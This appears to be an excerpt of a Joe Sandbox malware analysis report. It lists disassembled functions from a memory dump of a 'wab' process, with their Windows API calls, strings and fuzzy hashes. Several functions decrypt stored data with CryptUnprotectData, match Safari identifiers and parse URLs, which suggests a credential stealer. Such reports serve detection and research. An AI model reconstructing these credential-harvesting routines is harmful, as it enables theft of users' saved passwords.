                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                APIs
                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                APIs
                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                APIs
                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                APIs
                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                APIs
                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                APIs
                                • memset.MSVCRT ref: 004095FC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                • String ID:
                                • API String ID: 3655998216-0
                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                APIs
                                • memset.MSVCRT ref: 00445426
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                • String ID:
                                • API String ID: 1828521557-0
                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                APIs
                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$CloseCreateErrorHandleLastRead
                                • String ID:
                                • API String ID: 2136311172-0
                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                APIs
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@
                                • String ID:
                                • API String ID: 1936579350-0
                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                APIs
                                • EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                • GetLastError.KERNEL32 ref: 0040995D
                                • CloseHandle.KERNEL32(?), ref: 00409969
                                • GetLastError.KERNEL32 ref: 00409974
                                • CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                • String ID:
                                • API String ID: 2565263379-0
                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                APIs
                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                APIs
                                • EmptyClipboard.USER32 ref: 00409882
                                • wcslen.MSVCRT ref: 0040988F
                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                • memcpy.MSVCRT ref: 004098B5
                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                • CloseClipboard.USER32 ref: 004098D7
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                • String ID:
                                • API String ID: 2014503067-0
                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                APIs
                                • GetLastError.KERNEL32 ref: 004182D7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                • LocalFree.KERNEL32(?), ref: 00418342
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                • String ID: OsError 0x%x (%u)
                                • API String ID: 403622227-2664311388
                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                APIs
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                • OpenClipboard.USER32(?), ref: 00411878
                                • GetLastError.KERNEL32 ref: 0041188D
                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                • String ID:
                                • API String ID: 1203541146-0
                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Version
                                • String ID:
                                • API String ID: 1889659487-0
                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                APIs
                                • _wcsicmp.MSVCRT ref: 004022A6
                                • _wcsicmp.MSVCRT ref: 004022D7
                                • _wcsicmp.MSVCRT ref: 00402305
                                • _wcsicmp.MSVCRT ref: 00402333
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • memset.MSVCRT ref: 0040265F
                                • memcpy.MSVCRT ref: 0040269B
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • memcpy.MSVCRT ref: 004026FF
                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                • API String ID: 2929817778-1134094380
                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                • String ID: :stringdata$ftp://$http://$https://
                                • API String ID: 2787044678-1921111777
                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                • GetWindowRect.USER32(?,?), ref: 00414088
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                • GetDC.USER32 ref: 004140E3
                                • wcslen.MSVCRT ref: 00414123
                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                • ReleaseDC.USER32(?,?), ref: 00414181
                                • _snwprintf.MSVCRT ref: 00414244
                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                • GetClientRect.USER32(?,?), ref: 004142E1
                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                • GetClientRect.USER32(?,?), ref: 0041433B
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
